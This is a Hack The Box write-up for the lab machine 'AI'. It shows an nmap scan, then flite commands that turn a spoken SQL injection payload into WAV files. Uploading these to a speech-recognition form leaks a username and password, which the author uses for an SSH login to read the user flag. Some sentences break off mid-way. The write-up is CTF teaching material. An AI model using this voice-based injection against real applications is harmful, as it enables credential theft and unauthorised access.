Hack The Box AI Machine Writeup – 10.10.10.163
Hello, here is the writeup of Hack The Box AI new active machine. As usual I’m going to add IP 10.10.10.163 to etc/hosts as ai.htb for easiness.
Initial NAMP Scanning
➜ ai nmap -T4 -A -v ai.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 20:04 +03 NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 20:04 Completed NSE at 20:04, 0.00s elapsed Initiating NSE at 20:04 Completed NSE at 20:04, 0.00s elapsed Initiating NSE at 20:04 Completed NSE at 20:04, 0.00s elapsed Initiating Ping Scan at 20:04 Scanning ai.htb (10.10.10.163) [4 ports] Completed Ping Scan at 20:04, 0.29s elapsed (1 total hosts) Initiating SYN Stealth Scan at 20:04 Scanning ai.htb (10.10.10.163) [1000 ports] Discovered open port 22/tcp on 10.10.10.163 Discovered open port 80/tcp on 10.10.10.163 Increasing send delay for 10.10.10.163 from 0 to 5 due to 290 out of 724 dropped probes since last increase. Completed SYN Stealth Scan at 20:04, 9.04s elapsed (1000 total ports) Initiating Service scan at 20:04 Scanning 2 services on ai.htb (10.10.10.163) Completed Service scan at 20:04, 6.37s elapsed (2 services on 1 host) Initiating OS detection (try #1) against ai.htb (10.10.10.163) Retrying OS detection (try #2) against ai.htb (10.10.10.163) Retrying OS detection (try #3) against ai.htb (10.10.10.163) Retrying OS detection (try #4) against ai.htb (10.10.10.163) Retrying OS detection (try #5) against ai.htb (10.10.10.163) Initiating Traceroute at 20:04 Completed Traceroute at 20:04, 0.20s elapsed Initiating Parallel DNS resolution of 2 hosts. at 20:04 Completed Parallel DNS resolution of 2 hosts. at 20:04, 0.77s elapsed NSE: Script scanning 10.10.10.163. Initiating NSE at 20:04 Completed NSE at 20:04, 6.17s elapsed Initiating NSE at 20:04 Completed NSE at 20:04, 0.67s elapsed Initiating NSE at 20:04 Completed NSE at 20:04, 0.00s elapsed Nmap scan report for ai.htb (10.10.10.163) Host is up (0.16s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA) | 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA) |_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Hello AI! No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=11/11%OT=22%CT=1%CU=43569%PV=Y%DS=2%DC=T%G=Y%TM=5DC994 OS:BB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OP OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F= OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5( OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z% OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C OS:D=S) Uptime guess: 25.597 days (since Thu Oct 17 05:45:15 2019) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 199.36 ms 10.10.14.1 2 167.95 ms ai.htb (10.10.10.163) NSE: Script Post-scanning. Initiating NSE at 20:05 Completed NSE at 20:05, 0.00s elapsed Initiating NSE at 20:05 Completed NSE at 20:05, 0.00s elapsed Initiating NSE at 20:05 Completed NSE at 20:05, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds Raw packets sent: 1779 (82.330KB) | Rcvd: 1162 (74.241KB)
The namp scan revealed couple of ports open, 80 an websrver and 22 an SSH port. Lets investigate the port 80 first.
Port 80 has a web server that hosts a website called “Artificial Intelligence”, there are 4 links, Home, About, AI and Contact. The About has a small introduction that says “Our developers working 24/7 to make it happen and we progressed well with
AI has file upoload page, which is interesting, the contact page hasmachine maker MrR3boot’s fake email id.
If you have root the machine Player, you should have come across the same situation. That machine as well as has the same scenario of uploading
Lets exploit it
I’m going to use Flite to create a
ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, username from users comment database"
Above command will create a wav file called nav1n.wav, I’m going to upload it using the upload form.
Well, I have the username “Alexa” now.
Lests modify the commad to get the password for the user Alexa.
➜ ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, password from users comment database"
AsI already have the credentials, lets try if the SSH works.
➜ ai ssh firstname.lastname@example.org email@example.com's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.3.7-050307-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Nov 11 17:49:45 UTC 2019 System load: 0.06 Processes: 149 Usage of /: 28.2% of 19.56GB Users logged in: 0 Memory usage: 27% IP address for eth0: 10.10.10.163 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 63 packages can be updated. 15 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Nov 11 17:01:16 2019 from 10.10.14.35 alexa@AI:~$
Yesss, it works. Lets see if I can find user.txt
Last login: Mon Nov 11 17:01:16 2019 from 10.10.14.35 alexa@AI:~$ ls user.txt alexa@AI:~$ cat user.txt c43b62[-----------]da55e4b alexa@AI:~$
That’s it for today.